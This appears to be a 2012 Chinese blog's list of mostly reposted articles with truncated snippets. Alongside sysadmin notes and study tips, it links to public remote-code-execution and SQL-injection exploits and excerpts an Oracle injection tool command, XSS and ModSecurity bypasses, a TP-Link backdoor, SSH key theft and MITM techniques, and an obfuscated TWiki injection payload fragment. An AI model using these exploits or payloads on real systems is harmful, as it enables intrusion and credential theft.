- 博客(49)
- 资源 (2)
- 收藏
- 关注
转载 oracle access manager sso
http://www.oracle.com/technetwork/middleware/downloads/oid-11g-161194.html?ssSourceSiteId=ocomen
2012-10-31 20:12:28 938
转载 调戏突破SecureRDP对远程桌面连接的限制
缘起自某群某孩纸遇到的一案例! 连接远程桌面的时候服务器出现如下提示: You are not allowed to access to this Terminal Server. Please contact your administrator for more information. Secured by SecureRDP.仔细一看不是远程管理组的问题,而是SecureR
2012-10-31 17:18:09 1561 1
转载 rhel docs
https://access.redhat.com/knowledge/docs/en-US/Red_Hat_Enterprise_Linux/6/
2012-10-28 21:47:52 544
转载 各个版本linux查询
http://distrowatch.com/search.php?ostype=Linux&category=Firewall&origin=All&basedon=All¬basedon=None&desktop=All&architecture=All&status=Active
2012-10-28 14:46:46 588
转载 三种不需要盲注的oracle注入工具
E:\tools>OraInj-error.pl “http://www.mic*.com/index.php?id=421″ ==========================================================================Oracle Injection with Display errorsv0.8 beta
2012-10-23 15:40:04 3570
转载 CentOS 5.6 - php53-common conflicts with php-common
You have PHP 5.1.6 installed on CentOS 5.6 and want to update to PHP 5.3 like this:yum install php53 php53-cli php53-common php53-gd php53-imap php53-intl php53-mbstring php53-mysql php53-odbc php
2012-10-23 12:57:54 10147
转载 backdoor by authorized_keys2 leftovers
http://lists.mindrot.org/pipermail/openssh-unix-dev/2011-May/029518.html
2012-10-23 10:07:53 689
转载 艾宾浩斯记忆曲线背单词(转)
一、 复习点的确定(根据艾宾浩斯记忆曲线制定): 1. 第一个记忆周期:5分钟 2. 第二个记忆周期:30分钟 3. 第三个记忆周期:12小时 4. 第四个记忆周期:1天 5. 第五个记忆周期:2天 6. 第六个记忆周期:4天 7. 第七个记忆周期:7天 8. 第八个记忆周期:15天 二、背诵方法: 1. 初记单词时需要记忆的内容: a)单词外观,b
2012-10-22 22:03:34 2739
转载 openssh源代码阅读指南
http://wenku.baidu.com/view/b7bb4b22aaea998fcc220e62.html
2012-10-22 16:26:59 5320
转载 使用ssh-agent
sh-agent是一种控制用来保存公钥身份验证所使用的私钥的程序。ssh-agent在X会话或登录会话之初启动,所有其他窗口或程序则以客户端程序的身份启动并加入到ssh-agent程序中。通过使用环境变量,可定位代理并在登录到其他使用ssh机器上时使用代理自动进行身份验证。 其实ssh-agent就是一个密钥管理器,运行ssh-agent以后,使用ssh-add将私钥交给ssh-agent
2012-10-22 14:00:48 839
转载 DB2 UDB 9.1 For AIX 安装指南
http://www.ibm.com/developerworks/cn/education/aix/db2inst/section3.html
2012-10-22 09:38:21 643
转载 让XSS攻击来得更猛烈些吧——一种新型的绕过XSS防御的方法
让XSS攻击来得更猛烈些吧 一种新型的绕过XSS防御的方法 大家都知道,普遍的防御XSS攻击的方法是在后台对以下字符进行转义:、’、”,但是经过本人的研究发现,在一些特殊场景下,即使对以上字符进行了转义,还是可以执行XSS攻击的。 首先看一个JS的例子: var s
2012-10-21 14:35:28 2435
转载 网络应用瑞士军刀——Zentyal
在写本文之前,游侠在百度和谷歌搜了下,发现介绍Zentyal的文章不算多。确切的说,有点少。那么先给大家介绍下Zentyal(来自百度百科):Zentyal 的前身是eBox Platform,非常流行的Linux安全网关发行版。Zentyal将作为eBox的社区版品牌,而本身的eBox将作为公司的商业版服务。Zentyal提供了网关基础管理,统一威胁管理,办公服务,统一通信服务等。该
2012-10-21 11:42:16 2223
转载 perl python c语言视频教程自动发货
http://ttziliao.taobao.com/?spm=a1z10.3.w2.3.251016
2012-10-20 14:13:00 1272
转载 ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi
http://www.exploit-db.com/exploits/22093/#!/usr/bin/python#+----------------------------------------------------------------------------------------------------------------------
2012-10-20 12:50:17 1325
转载 Security Issues in Perl Scripts
http://www.yossman.net/support/cgisecurity.html#auto_3.1http://www.cgisecurity.com/lib/sips.html
2012-10-19 17:33:18 446
转载 ModSecurity 2.6.8 Bypass
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: ModSecurity multipart/invalid part ruleset bypas
2012-10-19 15:42:40 806
转载 Oracle Database Authentication Protocol Security Bypass
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker can exploit this issue to bypass the authentication process and gai
2012-10-19 15:40:14 624
转载 twiki漏洞
# A = m, B = y, C = s, E = d, F = h, G = w, X = /%SEARCH{date="Pour $X='X';$X=~tr#X#\057#;our $A='X';$A=~tr#X#\155#;our %$B='X';$B=~tr#X#\171#;our $C='X';$C=~tr#X#\163#;our %$E='X';$E=~tr#X#\144#;our
2012-10-19 13:40:51 967
转载 SSH2 “MITM” like attack with JMITM2
First: the following attack is not a real (at least not a perfect) man-in-the-middle attack, since the target will get a warning about the altered SSH server footprint and the attacker needs to “hij
2012-10-19 09:45:53 667
转载 Leveraging a symlink attack to steal DSA keys
Author:Peter van Dijk peter@7bits.nlVersion:20110530-4IMPORTANTIf you are on Ubuntu: please update libpam-modules now (see USN-1140-1). If you are on Debian: please implement t
2012-10-19 09:22:14 830
转载 SSH Man-in-the-Middle Attack and Public-Key Authentication Method
http://www.signedness.org/tools/SSH is a protocol for secure remote login and other secure network services over insecure networks. To detect man-in-the-middle attacks SSH clients are supposed t
2012-10-19 09:01:13 1120
转载 tp-link后门
Existe una interfaz de depuración via web con privilegios de root y credenciales estáticas en routers TP-Link WDR740Modelos:WR740N, WR740ND y posiblemente otrosActualizació
2012-10-19 08:50:55 4299
转载 NagiosQL添加监控主机及Nagios上启用报警机制
监控Windows主机nagios监控windows系统主机有三种实现方式:SNMP,NSClient++,NRPE,后面两种方式都需要在windows上安装agent,本文档只介绍使用NSClient++方式来监控Windows被监控机Windows主机插件安装和配置下载地址:http://nsclient.org/nscp/downloads这里我用到的
2012-10-19 08:47:36 2516
转载 Samba vfs: mysql_audit 備忘
目的: 使用 mysql 記錄 samba audit log, 並以 php 網頁查閱資料環境: 基於 原始碼安裝 Samba + Samba-vscanSMBD Audit 官方網頁: http://smbdaudit.sourceforge.net/下載 smb_audit-0.3.7cd /usr/local/src/wget "http://sou
2012-10-17 17:20:16 1837
原创 Sonatype Nexus
http://www.sonatype.org/nexus/jenkinshttp://jenkins-ci.org/
2012-10-17 15:42:39 665
转载 Webmin /file/show.cgi Remote Command Execution
http://packetstormsecurity.org/files/116620/webmin_show_cgi_exec.rb.txt
2012-10-16 19:21:20 645
转载 Xoops 2.3.2 Remote Code Execution
http://packetstormsecurity.org/files/117024/xoops_rce.py.txt
2012-10-16 19:18:33 778
转载 Zabbix 1.6.2 Remote Code Execution
http://packetstormsecurity.org/files/117025/Zabbix_RCE.py.txt
2012-10-16 19:17:42 517 1
转载 MetaSploit Framework 'pcap_log' Plugin Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/54472/exploit
2012-10-16 10:23:00 595
转载 RouterDefense
路由器安全评估工具 - RouterDefenseRouterDefense是一个Cisco IOS安全评估工具,它可以深入的测试路由器或交换机的配置,测试完成之后给出一个安全建议报告。 工具更多信息及下载地址:http://code.google.com/p/routerdefense/
2012-10-14 22:19:31 498
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人